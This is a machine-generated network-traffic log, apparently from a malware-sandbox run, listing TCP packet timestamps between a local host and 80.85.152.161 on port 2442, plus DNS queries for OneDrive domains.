                                                                                                                                                  Apr 19, 2024 16:17:28.824070930 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824070930 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824140072 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824177980 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824188948 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824215889 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824251890 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824258089 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824289083 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824327946 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824328899 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824364901 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824400902 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824403048 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824439049 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824475050 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824479103 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824512005 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824548960 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824551105 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824585915 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824623108 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824624062 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824659109 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824696064 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824700117 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824733019 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824769020 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824770927 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824806929 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824841976 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824843884 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824878931 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824914932 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824918985 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824953079 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824990988 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.825001001 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.825031996 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.825067997 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.825068951 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.825105906 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.825141907 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.825145960 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.825179100 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.825215101 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.825220108 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.825252056 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.825289011 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.825289011 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.825326920 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.825362921 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.825366974 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.825398922 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.825433969 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.825438023 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.847819090 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:29.111717939 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:29.111907959 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:29.111960888 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:38.870815992 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:39.117047071 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:39.117178917 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:44.124094009 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:44.124181986 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:44.370163918 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:44.370317936 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:44.616421938 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:44.616637945 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:44.676502943 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:44.676563978 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:44.862485886 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:44.862864971 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:44.862929106 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:44.863002062 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:44.922637939 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:44.922792912 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.109138966 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.109206915 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.109396935 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.109396935 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.110795021 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.110879898 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.168885946 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.169171095 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.169214010 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.169298887 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.355216980 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.355361938 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.355458021 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.355532885 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.356137991 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.356210947 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.356812954 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.356877089 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.357856035 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.357917070 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.358223915 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.358292103 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.359271049 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.359342098 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.360301018 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.360368013 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.414988041 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.415137053 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.416188955 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.416922092 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.419589996 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.601396084 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.601579905 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.601809025 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.601887941 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.602027893 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.602103949 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.603158951 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.603235960 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.603842020 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.603920937 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.605179071 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.605253935 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.605940104 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.605998993 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.606627941 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.606703997 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.607266903 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.607330084 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.608072042 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.608149052 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.608764887 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.608829021 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.609687090 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.609751940 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.610150099 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.610213995 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.610513926 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.610580921 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.665594101 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.665800095 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:45.665970087 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.666481972 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.667686939 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.667857885 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.669620037 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.671061993 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.850056887 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.850153923 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.851238012 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.852001905 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.852683067 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.853370905 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.854062080 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.854768991 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.855356932 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.856123924 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.856823921 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.857539892 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.858273029 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.860502958 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.860534906 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.860564947 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.860599041 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.863106966 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.863888979 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.864176989 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.864207983 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.864238977 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.864269972 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.864788055 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.865583897 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.865845919 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.866867065 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.911575079 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.911673069 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:45.912451982 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:46.047348022 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:46.250910044 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:46.496627092 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:46.718940973 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:46.903728962 CEST49184443192.168.2.22150.171.41.11
                                                                                                                                                  Apr 19, 2024 16:17:46.903776884 CEST44349184150.171.41.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:46.903841972 CEST49184443192.168.2.22150.171.41.11
                                                                                                                                                  Apr 19, 2024 16:17:46.905455112 CEST49184443192.168.2.22150.171.41.11
                                                                                                                                                  Apr 19, 2024 16:17:46.905474901 CEST44349184150.171.41.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:47.279915094 CEST44349184150.171.41.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:47.280114889 CEST49184443192.168.2.22150.171.41.11
                                                                                                                                                  Apr 19, 2024 16:17:47.284181118 CEST49184443192.168.2.22150.171.41.11
                                                                                                                                                  Apr 19, 2024 16:17:47.284193039 CEST44349184150.171.41.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:47.284567118 CEST44349184150.171.41.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:47.335532904 CEST49184443192.168.2.22150.171.41.11
                                                                                                                                                  Apr 19, 2024 16:17:47.376147032 CEST44349184150.171.41.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:48.188142061 CEST44349184150.171.41.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:48.188270092 CEST44349184150.171.41.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:48.188316107 CEST49184443192.168.2.22150.171.41.11
                                                                                                                                                  Apr 19, 2024 16:17:48.322602987 CEST49184443192.168.2.22150.171.41.11
                                                                                                                                                  Apr 19, 2024 16:17:48.941292048 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:49.187086105 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:49.187271118 CEST24424918380.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:49.187323093 CEST491832442192.168.2.2280.85.152.161
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 19, 2024 16:16:42.954482079 CEST6050753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:43.399663925 CEST5044653192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:44.822067022 CEST5593953192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:45.154577971 CEST5593953192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:45.262969971 CEST5593953192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:45.372275114 CEST5593953192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:45.530738115 CEST5593953192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:45.713149071 CEST4960853192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:45.970340014 CEST4960853192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:46.081866980 CEST6148653192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:46.187068939 CEST6148653192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:46.292206049 CEST6148653192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:46.524271011 CEST6148653192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:46.629687071 CEST6148653192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:47.820249081 CEST6245353192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:48.046762943 CEST6245353192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:48.152189016 CEST6245353192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:48.310214043 CEST6245353192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:48.611421108 CEST5056853192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:48.728960991 CEST5056853192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:16:48.834635973 CEST5056853192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:00.385827065 CEST6146753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:00.492229939 CEST53614678.8.8.8192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:00.492476940 CEST6146753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:00.597832918 CEST53614678.8.8.8192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:06.044245958 CEST6161853192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:06.669373035 CEST5442253192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:08.817966938 CEST5207453192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:08.923708916 CEST5207453192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:09.442950964 CEST5033753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:09.616914988 CEST5033753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:10.036734104 CEST5033753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:10.276607990 CEST5033753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:10.384351015 CEST5033753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:15.113112926 CEST6182653192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:15.442236900 CEST5632953192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:16.700238943 CEST6346953192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:16.785896063 CEST5944753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:16.811804056 CEST5182853192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:16.957478046 CEST5340653192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:18.315023899 CEST5634553192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:18.436022997 CEST5634553192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:18.559931040 CEST5634553192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:18.670434952 CEST5634553192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:18.785351992 CEST5187053192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:18.906725883 CEST5187053192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:19.029267073 CEST5187053192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:20.440167904 CEST6500953192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:20.561587095 CEST6500953192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:20.755750895 CEST6500953192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:20.945257902 CEST6500953192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:21.164099932 CEST6500953192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:29.107588053 CEST6495653192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:29.212724924 CEST53649568.8.8.8192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:29.213006020 CEST6495653192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:29.317672014 CEST53649568.8.8.8192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:29.317933083 CEST6495653192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:29.423091888 CEST53649568.8.8.8192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:29.423310041 CEST6495653192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:29.528367996 CEST53649568.8.8.8192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:46.623644114 CEST5452153192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:46.794909000 CEST4975053192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:48.363692999 CEST6468753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:48.500835896 CEST6468753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:48.622031927 CEST6468753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:48.728241920 CEST6468753192.168.2.228.8.8.8
                                                                                                                                                  Apr 19, 2024 16:17:48.833736897 CEST6468753192.168.2.228.8.8.8
                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Apr 19, 2024 16:16:42.954482079 CEST192.168.2.228.8.8.80xac83Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:43.399663925 CEST192.168.2.228.8.8.80xeefaStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:44.822067022 CEST192.168.2.228.8.8.80x7abdStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.154577971 CEST192.168.2.228.8.8.80x7abdStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.262969971 CEST192.168.2.228.8.8.80x7abdStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.372275114 CEST192.168.2.228.8.8.80x7abdStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.530738115 CEST192.168.2.228.8.8.80x7abdStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.713149071 CEST192.168.2.228.8.8.80xfe0fStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.970340014 CEST192.168.2.228.8.8.80xfe0fStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.081866980 CEST192.168.2.228.8.8.80xbea2Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.187068939 CEST192.168.2.228.8.8.80xbea2Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.292206049 CEST192.168.2.228.8.8.80xbea2Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.524271011 CEST192.168.2.228.8.8.80xbea2Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.629687071 CEST192.168.2.228.8.8.80xbea2Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:47.820249081 CEST192.168.2.228.8.8.80x9edeStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.046762943 CEST192.168.2.228.8.8.80x9edeStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.152189016 CEST192.168.2.228.8.8.80x9edeStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
